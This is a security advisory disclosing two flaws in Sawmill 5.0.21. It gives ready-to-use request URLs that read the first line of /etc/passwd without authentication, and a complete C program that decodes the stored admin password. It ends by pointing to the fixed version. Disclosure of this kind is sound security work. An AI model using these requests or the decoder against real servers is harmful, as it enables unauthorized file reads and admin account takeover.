COMMAND

    sawmill

SYSTEMS AFFECTED

    sawmill5.0.21

PROBLEM

    Larry  Cashdollar  found  following.    SawMill  is  a  site   log
    statistics package for  UNIX, Windows and  MacOS.  Tests  has done
    under Linux.  In test configuration sawmill listened on port  8987
    on webserver.  You cna notice two things.

    1) You can get sawmill to read  you the first line of any (if  run
       as nobody) world readable files without needing to authenticate
       first.  The following will print the first line of /etc/passwd:

        http://192.168.1.65:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3

       You can  imagine how  much more  fun this  would be  if it  was
       launched as root.  Which it should not and does not need to be.

    2) The password is  stored with a weak  hash algorithm and can  be
       decrypted  using  the  attached  C  program.  This is dangerous
       because the previous security hole  will allow you to read  the
       first line  of the  sawmill/SawmillInfo/SawmillPassword decrypt
       the  password  and  access  the  site  statistics,  reconfigure
       sawmill.  Along with the ability to browse the remote  machines
       drive contents.  If this is being run as root then the attacker
       can specify root readonly files  as log files and read  most if
       not all of their contents.

    /*Decrypt password for Sawmill admin account.

    Larry W. Cashdollar
    lwc@vapid.betteros.org
    http://vapid.betteros.org
    usage ./decrypt cyphertext

    */

    #include <stdio.h>

    char *alpha ="abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_+~<>?:\"{}|";
    char *encode="=GeKMNQS~TfUVWXY[abcygimrs\"#$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";

    int
    main (int argc, char **argv)
    {

      int x, y;
      char cypher[128];

      strncpy (cypher, argv[1], 128);

      for (x = 0; x < strlen (cypher); x++)
        {

          for (y = 0; y < strlen (encode); y++)
	    if (cypher[x] == encode[y])
	      printf ("%c", alpha[y]);

        }

    printf("\n\"+\" could also be a space [ ]\n");

    }

    Sawmill  can  also  be  run  as  a  cgi  script.   This  method is
    vulnerable as well.   The following will  print the first  line of
    the password file

        http://www.example.com/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1

SOLUTION

    Sawmill issued a new version of Flowerfire Sawmill (5.0.22)  which
    corrects both of the vulnerabilities mentioned above.  The  update
    is free.